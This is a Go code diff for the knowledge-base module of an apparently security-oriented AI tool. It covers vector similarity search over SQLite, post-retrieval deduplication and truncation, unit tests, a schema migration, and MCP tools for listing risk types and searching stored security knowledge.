// ApplyPostRetrieve 检索后处理:规范化正文去重 → 预算截断 → 最终 TopK。重排在 [VectorEinoRetriever] 中单独调用以便失败时降级。
|
||||
func ApplyPostRetrieve(docs []*schema.Document, po *config.PostRetrieveConfig, tokenModel string, finalTopK int) ([]*schema.Document, error) {
|
||||
if finalTopK < 1 {
|
||||
finalTopK = 5
|
||||
}
|
||||
if len(docs) == 0 {
|
||||
return docs, nil
|
||||
}
|
||||
|
||||
maxChars := 0
|
||||
maxTok := 0
|
||||
if po != nil {
|
||||
maxChars = po.MaxContextChars
|
||||
maxTok = po.MaxContextTokens
|
||||
}
|
||||
|
||||
out := dedupeByNormalizedContent(docs)
|
||||
|
||||
var err error
|
||||
out, err = truncateDocumentsByBudget(out, maxChars, maxTok, tokenModel)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
if len(out) > finalTopK {
|
||||
out = out[:finalTopK]
|
||||
}
|
||||
return out, nil
|
||||
}
|
||||
@@ -0,0 +1,62 @@
|
||||
package knowledge
|
||||
|
||||
import (
|
||||
"testing"
|
||||
|
||||
"cyberstrike-ai/internal/config"
|
||||
|
||||
"github.com/cloudwego/eino/schema"
|
||||
)
|
||||
|
||||
func doc(id, content string, score float64) *schema.Document {
|
||||
d := &schema.Document{ID: id, Content: content, MetaData: map[string]any{metaKBItemID: "it1"}}
|
||||
d.WithScore(score)
|
||||
return d
|
||||
}
|
||||
|
||||
func TestDedupeByNormalizedContent(t *testing.T) {
|
||||
a := doc("1", "hello world", 0.9)
|
||||
b := doc("2", "hello world", 0.8)
|
||||
c := doc("3", "other", 0.7)
|
||||
out := dedupeByNormalizedContent([]*schema.Document{a, b, c})
|
||||
if len(out) != 2 {
|
||||
t.Fatalf("len=%d want 2", len(out))
|
||||
}
|
||||
if out[0].ID != "1" || out[1].ID != "3" {
|
||||
t.Fatalf("order/ids wrong: %#v", out)
|
||||
}
|
||||
}
|
||||
|
||||
func TestEffectivePrefetchTopK(t *testing.T) {
|
||||
if g := EffectivePrefetchTopK(5, nil); g != 5 {
|
||||
t.Fatalf("got %d", g)
|
||||
}
|
||||
if g := EffectivePrefetchTopK(5, &config.PostRetrieveConfig{PrefetchTopK: 50}); g != 50 {
|
||||
t.Fatalf("got %d", g)
|
||||
}
|
||||
if g := EffectivePrefetchTopK(5, &config.PostRetrieveConfig{PrefetchTopK: 9999}); g != postRetrieveMaxPrefetchCap {
|
||||
t.Fatalf("cap: got %d", g)
|
||||
}
|
||||
}
|
||||
|
||||
func TestApplyPostRetrieveTruncateAndTopK(t *testing.T) {
|
||||
d1 := doc("1", "ab", 0.9)
|
||||
d2 := doc("2", "cd", 0.8)
|
||||
d3 := doc("3", "ef", 0.7)
|
||||
po := &config.PostRetrieveConfig{MaxContextChars: 3}
|
||||
out, err := ApplyPostRetrieve([]*schema.Document{d1, d2, d3}, po, "gpt-4", 5)
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
if len(out) != 1 || out[0].ID != "1" {
|
||||
t.Fatalf("got %#v", out)
|
||||
}
|
||||
|
||||
out2, err := ApplyPostRetrieve([]*schema.Document{d1, d2, d3}, nil, "gpt-4", 2)
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
if len(out2) != 2 {
|
||||
t.Fatalf("topk: len=%d", len(out2))
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,305 @@
|
||||
package knowledge
|
||||
|
||||
import (
|
||||
"context"
|
||||
"database/sql"
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"math"
|
||||
"sort"
|
||||
"strings"
|
||||
"sync"
|
||||
|
||||
"cyberstrike-ai/internal/config"
|
||||
|
||||
"github.com/cloudwego/eino/components/retriever"
|
||||
"github.com/cloudwego/eino/schema"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// Retriever 检索器:SQLite 存向量 + Eino 嵌入,**纯向量检索**(余弦相似度、TopK、阈值),
|
||||
// 实现语义与 [retriever.Retriever] 适配层 [VectorEinoRetriever] 一致。
|
||||
type Retriever struct {
|
||||
db *sql.DB
|
||||
embedder *Embedder
|
||||
config *RetrievalConfig
|
||||
logger *zap.Logger
|
||||
|
||||
rerankMu sync.RWMutex
|
||||
reranker DocumentReranker
|
||||
}
|
||||
|
||||
// RetrievalConfig 检索配置
|
||||
type RetrievalConfig struct {
|
||||
TopK int
|
||||
SimilarityThreshold float64
|
||||
// SubIndexFilter 非空时仅检索 sub_indexes 包含该标签(逗号分隔之一)的行;空 sub_indexes 的旧行仍保留以兼容。
|
||||
SubIndexFilter string
|
||||
PostRetrieve config.PostRetrieveConfig
|
||||
}
|
||||
|
||||
// NewRetriever 创建新的检索器
|
||||
func NewRetriever(db *sql.DB, embedder *Embedder, config *RetrievalConfig, logger *zap.Logger) *Retriever {
|
||||
return &Retriever{
|
||||
db: db,
|
||||
embedder: embedder,
|
||||
config: config,
|
||||
logger: logger,
|
||||
}
|
||||
}
|
||||
|
||||
// UpdateConfig 更新检索配置
|
||||
func (r *Retriever) UpdateConfig(cfg *RetrievalConfig) {
|
||||
if cfg != nil {
|
||||
r.config = cfg
|
||||
if r.logger != nil {
|
||||
r.logger.Info("检索器配置已更新",
|
||||
zap.Int("top_k", cfg.TopK),
|
||||
zap.Float64("similarity_threshold", cfg.SimilarityThreshold),
|
||||
zap.String("sub_index_filter", cfg.SubIndexFilter),
|
||||
zap.Int("post_retrieve_prefetch_top_k", cfg.PostRetrieve.PrefetchTopK),
|
||||
zap.Int("post_retrieve_max_context_chars", cfg.PostRetrieve.MaxContextChars),
|
||||
zap.Int("post_retrieve_max_context_tokens", cfg.PostRetrieve.MaxContextTokens),
|
||||
)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// SetDocumentReranker 注入可选重排器(并发安全);nil 表示禁用。
|
||||
func (r *Retriever) SetDocumentReranker(rr DocumentReranker) {
|
||||
if r == nil {
|
||||
return
|
||||
}
|
||||
r.rerankMu.Lock()
|
||||
defer r.rerankMu.Unlock()
|
||||
r.reranker = rr
|
||||
}
|
||||
|
||||
func (r *Retriever) documentReranker() DocumentReranker {
|
||||
if r == nil {
|
||||
return nil
|
||||
}
|
||||
r.rerankMu.RLock()
|
||||
defer r.rerankMu.RUnlock()
|
||||
return r.reranker
|
||||
}
|
||||
|
||||
func cosineSimilarity(a, b []float32) float64 {
|
||||
if len(a) != len(b) {
|
||||
return 0.0
|
||||
}
|
||||
|
||||
var dotProduct, normA, normB float64
|
||||
for i := range a {
|
||||
dotProduct += float64(a[i] * b[i])
|
||||
normA += float64(a[i] * a[i])
|
||||
normB += float64(b[i] * b[i])
|
||||
}
|
||||
|
||||
if normA == 0 || normB == 0 {
|
||||
return 0.0
|
||||
}
|
||||
|
||||
return dotProduct / (math.Sqrt(normA) * math.Sqrt(normB))
|
||||
}
|
||||
|
||||
// Search 搜索知识库。统一经 [VectorEinoRetriever](Eino retriever.Retriever 边界)。
|
||||
func (r *Retriever) Search(ctx context.Context, req *SearchRequest) ([]*RetrievalResult, error) {
|
||||
if req == nil {
|
||||
return nil, fmt.Errorf("请求不能为空")
|
||||
}
|
||||
q := strings.TrimSpace(req.Query)
|
||||
if q == "" {
|
||||
return nil, fmt.Errorf("查询不能为空")
|
||||
}
|
||||
opts := r.einoRetrieverOptions(req)
|
||||
docs, err := NewVectorEinoRetriever(r).Retrieve(ctx, q, opts...)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
return documentsToRetrievalResults(docs)
|
||||
}
|
||||
|
||||
func (r *Retriever) einoRetrieverOptions(req *SearchRequest) []retriever.Option {
|
||||
var opts []retriever.Option
|
||||
if req.TopK > 0 {
|
||||
opts = append(opts, retriever.WithTopK(req.TopK))
|
||||
}
|
||||
dsl := map[string]any{}
|
||||
if strings.TrimSpace(req.RiskType) != "" {
|
||||
dsl[DSLRiskType] = strings.TrimSpace(req.RiskType)
|
||||
}
|
||||
if req.Threshold > 0 {
|
||||
dsl[DSLSimilarityThreshold] = req.Threshold
|
||||
}
|
||||
if strings.TrimSpace(req.SubIndexFilter) != "" {
|
||||
dsl[DSLSubIndexFilter] = strings.TrimSpace(req.SubIndexFilter)
|
||||
}
|
||||
if len(dsl) > 0 {
|
||||
opts = append(opts, retriever.WithDSLInfo(dsl))
|
||||
}
|
||||
return opts
|
||||
}
|
||||
|
||||
// EinoRetrieve 直接返回 [schema.Document],供 Eino Graph / Chain 使用。
|
||||
func (r *Retriever) EinoRetrieve(ctx context.Context, query string, opts ...retriever.Option) ([]*schema.Document, error) {
|
||||
return NewVectorEinoRetriever(r).Retrieve(ctx, query, opts...)
|
||||
}
|
||||
|
||||
func (r *Retriever) knowledgeEmbeddingSelectSQL(riskType, subIndexFilter string) (string, []interface{}) {
|
||||
q := `SELECT e.id, e.item_id, e.chunk_index, e.chunk_text, e.embedding, e.embedding_model, e.embedding_dim, i.category, i.title
|
||||
FROM knowledge_embeddings e
|
||||
JOIN knowledge_base_items i ON e.item_id = i.id
|
||||
WHERE 1=1`
|
||||
var args []interface{}
|
||||
if strings.TrimSpace(riskType) != "" {
|
||||
q += ` AND TRIM(i.category) = TRIM(?) COLLATE NOCASE`
|
||||
args = append(args, riskType)
|
||||
}
|
||||
if tag := strings.TrimSpace(subIndexFilter); tag != "" {
|
||||
tag = strings.ToLower(strings.ReplaceAll(tag, " ", ""))
|
||||
q += ` AND (TRIM(COALESCE(e.sub_indexes,'')) = '' OR INSTR(',' || LOWER(REPLACE(e.sub_indexes,' ','')) || ',', ',' || ? || ',') > 0)`
|
||||
args = append(args, tag)
|
||||
}
|
||||
return q, args
|
||||
}
|
||||
|
||||
// vectorSearch 纯向量检索:余弦相似度排序,按相似度阈值与 TopK 截断(无 BM25、无混合分、无邻块扩展)。
|
||||
func (r *Retriever) vectorSearch(ctx context.Context, req *SearchRequest) ([]*RetrievalResult, error) {
|
||||
if req.Query == "" {
|
||||
return nil, fmt.Errorf("查询不能为空")
|
||||
}
|
||||
|
||||
topK := req.TopK
|
||||
if topK <= 0 && r.config != nil {
|
||||
topK = r.config.TopK
|
||||
}
|
||||
if topK <= 0 {
|
||||
topK = 5
|
||||
}
|
||||
|
||||
threshold := req.Threshold
|
||||
if threshold <= 0 && r.config != nil {
|
||||
threshold = r.config.SimilarityThreshold
|
||||
}
|
||||
if threshold <= 0 {
|
||||
threshold = 0.7
|
||||
}
|
||||
|
||||
subIdxFilter := strings.TrimSpace(req.SubIndexFilter)
|
||||
if subIdxFilter == "" && r.config != nil {
|
||||
subIdxFilter = strings.TrimSpace(r.config.SubIndexFilter)
|
||||
}
|
||||
|
||||
queryText := FormatQueryEmbeddingText(req.RiskType, req.Query)
|
||||
queryEmbedding, err := r.embedder.EmbedText(ctx, queryText)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("向量化查询失败: %w", err)
|
||||
}
|
||||
queryDim := len(queryEmbedding)
|
||||
expectedModel := ""
|
||||
if r.embedder != nil {
|
||||
expectedModel = r.embedder.EmbeddingModelName()
|
||||
}
|
||||
|
||||
sqlStr, sqlArgs := r.knowledgeEmbeddingSelectSQL(strings.TrimSpace(req.RiskType), subIdxFilter)
|
||||
rows, err := r.db.QueryContext(ctx, sqlStr, sqlArgs...)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("查询向量失败: %w", err)
|
||||
}
|
||||
defer rows.Close()
|
||||
|
||||
type candidate struct {
|
||||
chunk *KnowledgeChunk
|
||||
item *KnowledgeItem
|
||||
similarity float64
|
||||
}
|
||||
|
||||
candidates := make([]candidate, 0)
|
||||
rowNum := 0
|
||||
for rows.Next() {
|
||||
rowNum++
|
||||
if rowNum%48 == 0 {
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
return nil, ctx.Err()
|
||||
default:
|
||||
}
|
||||
}
|
||||
|
||||
var chunkID, itemID, chunkText, embeddingJSON, category, title, rowModel string
|
||||
var chunkIndex, rowDim int
|
||||
|
||||
if err := rows.Scan(&chunkID, &itemID, &chunkIndex, &chunkText, &embeddingJSON, &rowModel, &rowDim, &category, &title); err != nil {
|
||||
r.logger.Warn("扫描向量失败", zap.Error(err))
|
||||
continue
|
||||
}
|
||||
|
||||
var embedding []float32
|
||||
if err := json.Unmarshal([]byte(embeddingJSON), &embedding); err != nil {
|
||||
r.logger.Warn("解析向量失败", zap.Error(err))
|
||||
continue
|
||||
}
|
||||
|
||||
if rowDim > 0 && len(embedding) != rowDim {
|
||||
r.logger.Debug("跳过维度不一致的向量行", zap.String("chunkId", chunkID), zap.Int("rowDim", rowDim), zap.Int("got", len(embedding)))
|
||||
continue
|
||||
}
|
||||
if queryDim > 0 && len(embedding) != queryDim {
|
||||
r.logger.Debug("跳过与查询维度不一致的向量", zap.String("chunkId", chunkID), zap.Int("queryDim", queryDim), zap.Int("got", len(embedding)))
|
||||
continue
|
||||
}
|
||||
if expectedModel != "" && strings.TrimSpace(rowModel) != "" && strings.TrimSpace(rowModel) != expectedModel {
|
||||
r.logger.Debug("跳过嵌入模型不一致的行", zap.String("chunkId", chunkID), zap.String("rowModel", rowModel), zap.String("expected", expectedModel))
|
||||
continue
|
||||
}
|
||||
|
||||
similarity := cosineSimilarity(queryEmbedding, embedding)
|
||||
candidates = append(candidates, candidate{
|
||||
chunk: &KnowledgeChunk{
|
||||
ID: chunkID,
|
||||
ItemID: itemID,
|
||||
ChunkIndex: chunkIndex,
|
||||
ChunkText: chunkText,
|
||||
Embedding: embedding,
|
||||
},
|
||||
item: &KnowledgeItem{
|
||||
ID: itemID,
|
||||
Category: category,
|
||||
Title: title,
|
||||
},
|
||||
similarity: similarity,
|
||||
})
|
||||
}
|
||||
|
||||
sort.Slice(candidates, func(i, j int) bool {
|
||||
return candidates[i].similarity > candidates[j].similarity
|
||||
})
|
||||
|
||||
filtered := make([]candidate, 0, len(candidates))
|
||||
for _, c := range candidates {
|
||||
if c.similarity >= threshold {
|
||||
filtered = append(filtered, c)
|
||||
}
|
||||
}
|
||||
|
||||
if len(filtered) > topK {
|
||||
filtered = filtered[:topK]
|
||||
}
|
||||
|
||||
results := make([]*RetrievalResult, len(filtered))
|
||||
for i, c := range filtered {
|
||||
results[i] = &RetrievalResult{
|
||||
Chunk: c.chunk,
|
||||
Item: c.item,
|
||||
Similarity: c.similarity,
|
||||
Score: c.similarity,
|
||||
}
|
||||
}
|
||||
return results, nil
|
||||
}
|
||||
|
||||
// AsEinoRetriever 将纯向量检索暴露为 Eino [retriever.Retriever]。
|
||||
func (r *Retriever) AsEinoRetriever() retriever.Retriever {
|
||||
return NewVectorEinoRetriever(r)
|
||||
}
|
||||
@@ -0,0 +1,51 @@
|
||||
package knowledge
|
||||
|
||||
import (
|
||||
"database/sql"
|
||||
"fmt"
|
||||
)
|
||||
|
||||
// EnsureKnowledgeEmbeddingsSchema migrates knowledge_embeddings for sub_indexes + embedding metadata.
|
||||
func EnsureKnowledgeEmbeddingsSchema(db *sql.DB) error {
|
||||
if db == nil {
|
||||
return fmt.Errorf("db is nil")
|
||||
}
|
||||
var n int
|
||||
if err := db.QueryRow(`SELECT COUNT(*) FROM sqlite_master WHERE type='table' AND name='knowledge_embeddings'`).Scan(&n); err != nil {
|
||||
return err
|
||||
}
|
||||
if n == 0 {
|
||||
return nil
|
||||
}
|
||||
if err := addKnowledgeEmbeddingsColumnIfMissing(db, "sub_indexes",
|
||||
`ALTER TABLE knowledge_embeddings ADD COLUMN sub_indexes TEXT NOT NULL DEFAULT ''`); err != nil {
|
||||
return err
|
||||
}
|
||||
if err := addKnowledgeEmbeddingsColumnIfMissing(db, "embedding_model",
|
||||
`ALTER TABLE knowledge_embeddings ADD COLUMN embedding_model TEXT NOT NULL DEFAULT ''`); err != nil {
|
||||
return err
|
||||
}
|
||||
if err := addKnowledgeEmbeddingsColumnIfMissing(db, "embedding_dim",
|
||||
`ALTER TABLE knowledge_embeddings ADD COLUMN embedding_dim INTEGER NOT NULL DEFAULT 0`); err != nil {
|
||||
return err
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func addKnowledgeEmbeddingsColumnIfMissing(db *sql.DB, column, alterSQL string) error {
|
||||
var colCount int
|
||||
q := `SELECT COUNT(*) FROM pragma_table_info('knowledge_embeddings') WHERE name = ?`
|
||||
if err := db.QueryRow(q, column).Scan(&colCount); err != nil {
|
||||
return err
|
||||
}
|
||||
if colCount > 0 {
|
||||
return nil
|
||||
}
|
||||
_, err := db.Exec(alterSQL)
|
||||
return err
|
||||
}
|
||||
|
||||
// ensureKnowledgeEmbeddingsSubIndexesColumn 向后兼容;请使用 [EnsureKnowledgeEmbeddingsSchema]。
|
||||
func ensureKnowledgeEmbeddingsSubIndexesColumn(db *sql.DB) error {
|
||||
return EnsureKnowledgeEmbeddingsSchema(db)
|
||||
}
|
||||
@@ -0,0 +1,323 @@
|
||||
package knowledge
|
||||
|
||||
import (
|
||||
"context"
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"sort"
|
||||
"strings"
|
||||
|
||||
"cyberstrike-ai/internal/mcp"
|
||||
"cyberstrike-ai/internal/mcp/builtin"
|
||||
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// RegisterKnowledgeTool 注册知识检索工具到MCP服务器
|
||||
func RegisterKnowledgeTool(
|
||||
mcpServer *mcp.Server,
|
||||
retriever *Retriever,
|
||||
manager *Manager,
|
||||
logger *zap.Logger,
|
||||
) {
|
||||
// 注册第一个工具:获取所有可用的风险类型列表
|
||||
listRiskTypesTool := mcp.Tool{
|
||||
Name: builtin.ToolListKnowledgeRiskTypes,
|
||||
Description: "获取知识库中所有可用的风险类型(risk_type)列表。在搜索知识库之前,可以先调用此工具获取可用的风险类型,然后使用正确的风险类型进行精确搜索,这样可以大幅减少检索时间并提高检索准确性。",
|
||||
ShortDescription: "获取知识库中所有可用的风险类型列表",
|
||||
InputSchema: map[string]interface{}{
|
||||
"type": "object",
|
||||
"properties": map[string]interface{}{},
|
||||
"required": []string{},
|
||||
},
|
||||
}
|
||||
|
||||
listRiskTypesHandler := func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) {
|
||||
categories, err := manager.GetCategories()
|
||||
if err != nil {
|
||||
logger.Error("获取风险类型列表失败", zap.Error(err))
|
||||
return &mcp.ToolResult{
|
||||
Content: []mcp.Content{
|
||||
{
|
||||
Type: "text",
|
||||
Text: fmt.Sprintf("获取风险类型列表失败: %v", err),
|
||||
},
|
||||
},
|
||||
IsError: true,
|
||||
}, nil
|
||||
}
|
||||
|
||||
if len(categories) == 0 {
|
||||
return &mcp.ToolResult{
|
||||
Content: []mcp.Content{
|
||||
{
|
||||
Type: "text",
|
||||
Text: "知识库中暂无风险类型。",
|
||||
},
|
||||
},
|
||||
}, nil
|
||||
}
|
||||
|
||||
var resultText strings.Builder
|
||||
resultText.WriteString(fmt.Sprintf("知识库中共有 %d 个风险类型:\n\n", len(categories)))
|
||||
for i, category := range categories {
|
||||
resultText.WriteString(fmt.Sprintf("%d. %s\n", i+1, category))
|
||||
}
|
||||
resultText.WriteString("\n提示:在调用 " + builtin.ToolSearchKnowledgeBase + " 工具时,可以使用上述风险类型之一作为 risk_type 参数,以缩小搜索范围并提高检索效率。")
|
||||
|
||||
return &mcp.ToolResult{
|
||||
Content: []mcp.Content{
|
||||
{
|
||||
Type: "text",
|
||||
Text: resultText.String(),
|
||||
},
|
||||
},
|
||||
}, nil
|
||||
}
|
||||
|
||||
mcpServer.RegisterTool(listRiskTypesTool, listRiskTypesHandler)
|
||||
logger.Info("风险类型列表工具已注册", zap.String("toolName", listRiskTypesTool.Name))
|
||||
|
||||
// 注册第二个工具:搜索知识库(保持原有功能)
|
||||
searchTool := mcp.Tool{
|
||||
Name: builtin.ToolSearchKnowledgeBase,
|
||||
Description: "在知识库中搜索相关的安全知识。当你需要了解特定漏洞类型、攻击技术、检测方法等安全知识时,可以使用此工具进行检索。工具基于向量嵌入与余弦相似度检索(与 Eino retriever 语义一致)。建议:在搜索前可以先调用 " + builtin.ToolListKnowledgeRiskTypes + " 工具获取可用的风险类型,然后使用正确的 risk_type 参数进行精确搜索,这样可以大幅减少检索时间。",
|
||||
ShortDescription: "搜索知识库中的安全知识(向量语义检索)",
|
||||
InputSchema: map[string]interface{}{
|
||||
"type": "object",
|
||||
"properties": map[string]interface{}{
|
||||
"query": map[string]interface{}{
|
||||
"type": "string",
|
||||
"description": "搜索查询内容,描述你想要了解的安全知识主题",
|
||||
},
|
||||
"risk_type": map[string]interface{}{
|
||||
"type": "string",
|
||||
"description": "可选:指定风险类型(如:SQL注入、XSS、文件上传等)。建议先调用 " + builtin.ToolListKnowledgeRiskTypes + " 工具获取可用的风险类型列表,然后使用正确的风险类型进行精确搜索,这样可以大幅减少检索时间。如果不指定则搜索所有类型。",
|
||||
},
|
||||
},
|
||||
"required": []string{"query"},
|
||||
},
|
||||
}
|
||||
|
||||
searchHandler := func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) {
|
||||
query, ok := args["query"].(string)
|
||||
if !ok || query == "" {
|
||||
return &mcp.ToolResult{
|
||||
Content: []mcp.Content{
|
||||
{
|
||||
Type: "text",
|
||||
Text: "错误: 查询参数不能为空",
|
||||
},
|
||||
},
|
||||
IsError: true,
|
||||
}, nil
|
||||
}
|
||||
|
||||
riskType := ""
|
||||
if rt, ok := args["risk_type"].(string); ok && rt != "" {
|
||||
riskType = rt
|
||||
}
|
||||
|
||||
logger.Info("执行知识库检索",
|
||||
zap.String("query", query),
|
||||
zap.String("riskType", riskType),
|
||||
)
|
||||
|
||||
// 检索统一走 Retriever.Search → VectorEinoRetriever(Eino retriever 语义)。
|
||||
searchReq := &SearchRequest{
|
||||
Query: query,
|
||||
RiskType: riskType,
|
||||
TopK: 5,
|
||||
}
|
||||
|
||||
results, err := retriever.Search(ctx, searchReq)
|
||||
if err != nil {
|
||||
logger.Error("知识库检索失败", zap.Error(err))
|
||||
return &mcp.ToolResult{
|
||||
Content: []mcp.Content{
|
||||
{
|
||||
Type: "text",
|
||||
Text: fmt.Sprintf("检索失败: %v", err),
|
||||
},
|
||||
},
|
||||
IsError: true,
|
||||
}, nil
|
||||
}
|
||||
|
||||
if len(results) == 0 {
|
||||
return &mcp.ToolResult{
|
||||
Content: []mcp.Content{
|
||||
{
|
||||
Type: "text",
|
||||
Text: fmt.Sprintf("未找到与查询 '%s' 相关的知识。建议:\n1. 尝试使用不同的关键词\n2. 检查风险类型是否正确\n3. 确认知识库中是否包含相关内容", query),
|
||||
},
|
||||
},
|
||||
}, nil
|
||||
}
|
||||
|
||||
// 格式化结果
|
||||
var resultText strings.Builder
|
||||
|
||||
// 按余弦相似度(Score)降序
|
||||
sort.Slice(results, func(i, j int) bool {
|
||||
return results[i].Score > results[j].Score
|
||||
})
|
||||
|
||||
// 按文档分组结果,以便更好地展示上下文
|
||||
type itemGroup struct {
|
||||
itemID string
|
||||
results []*RetrievalResult
|
||||
maxScore float64 // 该文档块的最高相似度
|
||||
}
|
||||
itemGroups := make([]*itemGroup, 0)
|
||||
itemMap := make(map[string]*itemGroup)
|
||||
|
||||
for _, result := range results {
|
||||
itemID := result.Item.ID
|
||||
group, exists := itemMap[itemID]
|
||||
if !exists {
|
||||
group = &itemGroup{
|
||||
itemID: itemID,
|
||||
results: make([]*RetrievalResult, 0),
|
||||
maxScore: result.Score,
|
||||
}
|
||||
itemMap[itemID] = group
|
||||
itemGroups = append(itemGroups, group)
|
||||
}
|
||||
group.results = append(group.results, result)
|
||||
if result.Score > group.maxScore {
|
||||
group.maxScore = result.Score
|
||||
}
|
||||
}
|
||||
|
||||
// 按文档内最高相似度排序
|
||||
sort.Slice(itemGroups, func(i, j int) bool {
|
||||
return itemGroups[i].maxScore > itemGroups[j].maxScore
|
||||
})
|
||||
|
||||
// 收集检索到的知识项ID(用于日志)
|
||||
retrievedItemIDs := make([]string, 0, len(itemGroups))
|
||||
|
||||
resultText.WriteString(fmt.Sprintf("找到 %d 条相关知识片段:\n\n", len(results)))
|
||||
|
||||
resultIndex := 1
|
||||
for _, group := range itemGroups {
|
||||
itemResults := group.results
|
||||
mainResult := itemResults[0]
|
||||
maxScore := mainResult.Score
|
||||
for _, result := range itemResults {
|
||||
if result.Score > maxScore {
|
||||
maxScore = result.Score
|
||||
mainResult = result
|
||||
}
|
||||
}
|
||||
|
||||
// 按chunk_index排序,保证阅读的逻辑顺序(文档的原始顺序)
|
||||
sort.Slice(itemResults, func(i, j int) bool {
|
||||
return itemResults[i].Chunk.ChunkIndex < itemResults[j].Chunk.ChunkIndex
|
||||
})
|
||||
|
||||
resultText.WriteString(fmt.Sprintf("--- 结果 %d (相似度: %.2f%%) ---\n",
|
||||
resultIndex, mainResult.Similarity*100))
|
||||
resultText.WriteString(fmt.Sprintf("来源: [%s] %s (ID: %s)\n", mainResult.Item.Category, mainResult.Item.Title, mainResult.Item.ID))
|
||||
|
||||
// 按逻辑顺序显示所有chunk(包括主结果和扩展的chunk)
|
||||
if len(itemResults) == 1 {
|
||||
// 只有一个chunk,直接显示
|
||||
resultText.WriteString(fmt.Sprintf("内容片段:\n%s\n", mainResult.Chunk.ChunkText))
|
||||
} else {
|
||||
// 多个chunk,按逻辑顺序显示
|
||||
resultText.WriteString("内容片段(按文档顺序):\n")
|
||||
for i, result := range itemResults {
|
||||
// 标记主结果
|
||||
marker := ""
|
||||
if result.Chunk.ID == mainResult.Chunk.ID {
|
||||
marker = " [主匹配]"
|
||||
}
|
||||
resultText.WriteString(fmt.Sprintf(" [片段 %d%s]\n%s\n", i+1, marker, result.Chunk.ChunkText))
|
||||
}
|
||||
}
|
||||
resultText.WriteString("\n")
|
||||
|
||||
if !contains(retrievedItemIDs, group.itemID) {
|
||||
retrievedItemIDs = append(retrievedItemIDs, group.itemID)
|
||||
}
|
||||
resultIndex++
|
||||
}
|
||||
|
||||
// 在结果末尾添加元数据(JSON格式,用于提取知识项ID)
|
||||
// 使用特殊标记,避免影响AI阅读结果
|
||||
if len(retrievedItemIDs) > 0 {
|
||||
metadataJSON, _ := json.Marshal(map[string]interface{}{
|
||||
"_metadata": map[string]interface{}{
|
||||
"retrievedItemIDs": retrievedItemIDs,
|
||||
},
|
||||
})
|
||||
resultText.WriteString(fmt.Sprintf("\n<!-- METADATA: %s -->", string(metadataJSON)))
|
||||
}
|
||||
|
||||
// 记录检索日志(异步,不阻塞)
|
||||
// 注意:这里没有conversationID和messageID,需要在Agent层面记录
|
||||
// 实际的日志记录应该在Agent的progressCallback中完成
|
||||
|
||||
return &mcp.ToolResult{
|
||||
Content: []mcp.Content{
|
||||
{
|
||||
Type: "text",
|
||||
Text: resultText.String(),
|
||||
},
|
||||
},
|
||||
}, nil
|
||||
}
|
||||
|
||||
mcpServer.RegisterTool(searchTool, searchHandler)
|
||||
logger.Info("知识检索工具已注册", zap.String("toolName", searchTool.Name))
|
||||
}
|
||||
|
||||
// contains 检查切片是否包含元素
|
||||
func contains(slice []string, item string) bool {
|
||||
for _, s := range slice {
|
||||
if s == item {
|
||||
return true
|
||||
}
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
// GetRetrievalMetadata 从工具调用中提取检索元数据(用于日志记录)
|
||||
func GetRetrievalMetadata(args map[string]interface{}) (query string, riskType string) {
|
||||
if q, ok := args["query"].(string); ok {
|
||||
query = q
|
||||
}
|
||||
if rt, ok := args["risk_type"].(string); ok {
|
||||
riskType = rt
|
||||
}
|
||||
return
|
||||
}
|
||||
|
||||
// FormatRetrievalResults 格式化检索结果为字符串(用于日志)
|
||||
func FormatRetrievalResults(results []*RetrievalResult) string {
|
||||
if len(results) == 0 {
|
||||
return "未找到相关结果"
|
||||
}
|
||||
|
||||
var builder strings.Builder
|
||||
builder.WriteString(fmt.Sprintf("检索到 %d 条结果:\n", len(results)))
|
||||
|
||||
itemIDs := make(map[string]bool)
|
||||
for i, result := range results {
|
||||
builder.WriteString(fmt.Sprintf("%d. [%s] %s (相似度: %.2f%%)\n",
|
||||
i+1, result.Item.Category, result.Item.Title, result.Similarity*100))
|
||||
itemIDs[result.Item.ID] = true
|
||||
}
|
||||
|
||||
// 返回知识项ID列表(JSON格式)
|
||||
ids := make([]string, 0, len(itemIDs))
|
||||
for id := range itemIDs {
|
||||
ids = append(ids, id)
|
||||
}
|
||||
idsJSON, _ := json.Marshal(ids)
|
||||
builder.WriteString(fmt.Sprintf("\n检索到的知识项ID: %s", string(idsJSON)))
|
||||
|
||||
return builder.String()
|
||||
}
|
||||
@@ -0,0 +1,123 @@
|
||||
package knowledge
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"time"
|
||||
)
|
||||
|
||||
// formatTime 格式化时间为 RFC3339 格式,零时间返回空字符串
|
||||
func formatTime(t time.Time) string {
|
||||
if t.IsZero() {
|
||||
return ""
|
||||
}
|
||||
return t.Format(time.RFC3339)
|
||||
}
|
||||
|
||||
// KnowledgeItem 知识库项
|
||||
type KnowledgeItem struct {
|
||||
ID string `json:"id"`
|
||||
Category string `json:"category"` // 风险类型(文件夹名)
|
||||
Title string `json:"title"` // 标题(文件名)
|
||||
FilePath string `json:"filePath"` // 文件路径
|
||||
Content string `json:"content"` // 文件内容
|
||||
CreatedAt time.Time `json:"createdAt"`
|
||||
UpdatedAt time.Time `json:"updatedAt"`
|
||||
}
|
||||
|
||||
// KnowledgeItemSummary 知识库项摘要(用于列表,不包含完整内容)
|
||||
type KnowledgeItemSummary struct {
|
||||
ID string `json:"id"`
|
||||
Category string `json:"category"`
|
||||
Title string `json:"title"`
|
||||
FilePath string `json:"filePath"`
|
||||
Content string `json:"content,omitempty"` // 可选:内容预览(如果提供,通常只包含前 150 字符)
|
||||
CreatedAt time.Time `json:"createdAt"`
|
||||
